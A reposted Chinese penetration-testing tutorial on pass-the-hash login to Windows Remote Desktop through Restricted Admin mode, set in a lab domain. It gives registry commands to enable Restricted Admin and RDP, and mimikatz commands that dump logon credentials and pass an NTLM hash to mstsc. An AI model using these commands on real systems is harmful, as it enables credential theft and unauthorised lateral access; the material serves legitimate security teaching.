内网渗透:四、windowsRDP-hash传递登录

这篇具有很好参考价值的文章主要介绍了内网渗透:四、windowsRDP-hash传递登录。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

windows的RDP-hash登录利用

在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。

  • 0x01:windows RDP-受限管理模式

Restricted Admin mode简介
官方说明:
Restricted Admin mode for RDP in Windows 8.1 / 2012 R2 | Microsoft Docs
Restricted Admin mode,直译为受限管理模式,主要功能是使得凭据不会暴露在目标系统中

  • 0x02、如何开启EDP服务indows RDP-受限管理模式:
  • 一、安装补丁:此种方法未曾用过,不过看其他师傅的blog说原理同修改注册表一样

参考链接:
https://support.microsoft.com/en-us/help/2973351/microsoft-security-advisory-registry-update-to-improve-credentials-pro

  • 二、修改注册表
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
新建DWORD键值DisableRestrictedAdmin,值为0,代表开启;值为1,代表关闭
对应命令行开启的命令如下:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
  • 0x03 开启3389端口

查看RDP端口

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

得到连接端口为 0xd3d,转换后为 3389

windows server 2003

开启1:

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭:

REG ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开启2:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

windows server 2008

开启:

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
  • 0x04、hash传递登录

客户端命令行:
mstsc.exe /restrictedadmin
如果当前系统不支持Restricted Admin mode,执行后弹出远程桌面的参数说明

内网渗透:四、windowsRDP-hash传递登录

如果当前系统支持Restricted Admin mode,执行后弹出远程桌面的登录界面

 内网渗透:四、windowsRDP-hash传递登录

Restricted Admin mode使用当前Windows登录凭据,不需要输入口令,直接登录即可(Server开启Restricted Admin mode时,Client也需要支持Restricted Admin mode)

  • 0x05、实际操作

实验环境:

  • Windows server 2008 作为域控制器,域为 dc.com
  • Windows 10 作为 dc域下的一台设备

一、mimikatz

过去windows 10 的 NTLM hash:

mimikatz.exe
    privilege::debug
    sekurlsa::logonPasswords

获取当前用户zhangsan的 NTLM hash:    73292305e32730af1b5b94022b2b2aaa

 内网渗透:四、windowsRDP-hash传递登录

执行命令:

privilege::debug
sekurlsa::pth /user:administrator /domain:remoteserver /ntlm:73292305e32730af1b5b94022b2b2aaa "/run:mstsc.exe /restrictedadmin"

内网渗透:四、windowsRDP-hash传递登录

 选择连接,成功实现远程登录(此处需注意两个坑)

        a、在进行远程连接时出现:远程计算机不支持受限管理模式或远程防护

 内网渗透:四、windowsRDP-hash传递登录

        这总共有两种情况(计算机开启远程连接的情况):

                1:目标计算机不允许其他计算机远程协助该台计算机

内网渗透:四、windowsRDP-hash传递登录

                2、本地计算机注册表问题,具体参考上述开启方法

         b、服务端为win10或win7等个人pc操作系统时,通过NTLM hash登录后,无法进入桌面

提示由于安全策略被阻止

内网渗透:四、windowsRDP-hash传递登录文章来源地址https://www.toymoban.com/news/detail-468826.html

到了这里,关于内网渗透:四、windowsRDP-hash传递登录的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透测试实战 - 外网渗透内网穿透(超详细)

    做到一半环境崩了,IP地址以下面为准 拿下三台主机权限 信息收集 使用dirsearch扫描192.168.41.136的网站目录,发现 http://192.168.41.136/index.php 是Thinkphp框架 nmap扫描端口 22/21端口 弱口令爆破(MSF,hydra) 3306端口 不允许远程IP登录 8888端口 宝塔界面未知账号密码无法利用 80端口 Think

    2023年04月22日
    浏览(41)
  • [渗透测试]—7.3 内网渗透和提权技术

    在本章节中,我们将学习内网渗透和提权技术。我们会尽量详细、通俗易懂地讲解,并提供尽可能多的实例。 内网渗透是指攻击者在成功进入目标网络后,对内部资源进行横向渗透以获取更多权限和信息的过程。内网渗透测试的目的是发现网络内部存在的安全漏洞和风险,以

    2024年02月11日
    浏览(87)
  • web渗透、内网渗透,6个月以来的学习感受

    2022年5月,正式认识了网安这个行业,而此时的我已经34岁了,有自己的本职工作,出于浓厚的兴趣,上班之余开始了我的网安学习之路。 一、我的学习渠道: 1、花钱报班 报的哪个教育机构就不说了,现成的资料、渗透工具和网络视频教程学习起来方便,肯定比盲目的自学

    2024年02月04日
    浏览(46)
  • 内网渗透靶场02----Weblogic反序列化+域渗透

     网络拓扑:                  利用 kscan工具 ,针对192.168.111.0/24 C段开展端口扫描,发现2台存活主机,具体如下图所示:                 192.168.111.80  开放 80、445、3389、7001 端口。                 192.168.111.201 开放 3389、445 端口 根据上述端口发放情况

    2024年02月19日
    浏览(36)
  • 内网渗透解析

    阅读本文前需要先搞懂NAT、PAT、端口映射几个概念,内网宽带中的主机可以访问公网宽带主机,反之不可以访问;公网宽带主机可以和公网宽带主机双向访问;内网宽带中的主机和内网宽带中的主机互相无法访问。那么内网宽带中的客户机和公网宽带中的客户机如何访问另一

    2024年02月11日
    浏览(32)
  • 内网渗透---ms14068

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。 1、获取域普通用户的账

    2024年02月06日
    浏览(31)
  • 内网渗透实战攻略

    🌈个人主页:  Aileen_0v0 🔥热门专栏:  华为鸿蒙系统学习 | 计算机网络 | 数据结构与算法 💫个人格言: \\\"没有罗马,那就自己创造罗马~\\\" 目录 介绍 什么是内网? 什么是内网渗透? 内网渗透的目的: 内网渗透常规流程: 内网渗透技术 内网渗透技术学习 读者对象 如何阅读一本

    2024年02月02日
    浏览(47)
  • 内网渗透—隧道技术

      在进行渗透测试以及攻防演练的时候,通常会存在各种边界设备、软硬件防火墙、IPS等设备来检测外部连接情况,这些设备如果发现异常,就会对通信进行阻断。   那么隧道技术就是一种绕过端口屏蔽的通信方式,在实际情况中防火墙上会设定各种安全策略,比如允许

    2024年02月08日
    浏览(51)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(40)
  • 内网渗透代理知识以及渗透某CTF三层靶机实例

            在学习完小迪内网代理安全知识后,自己也找来了案例中的CTF比赛中三层靶机,来总结一下内网代理知识。实验中成功拿到三个flag,话不多说,现在就开始。 文章目录 前言 一、 内网代理知识 二 、CTF三层靶机实例 1. 靶机拓补图 2. 攻击目标1 3.添加路由 4.开启代

    2024年02月03日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包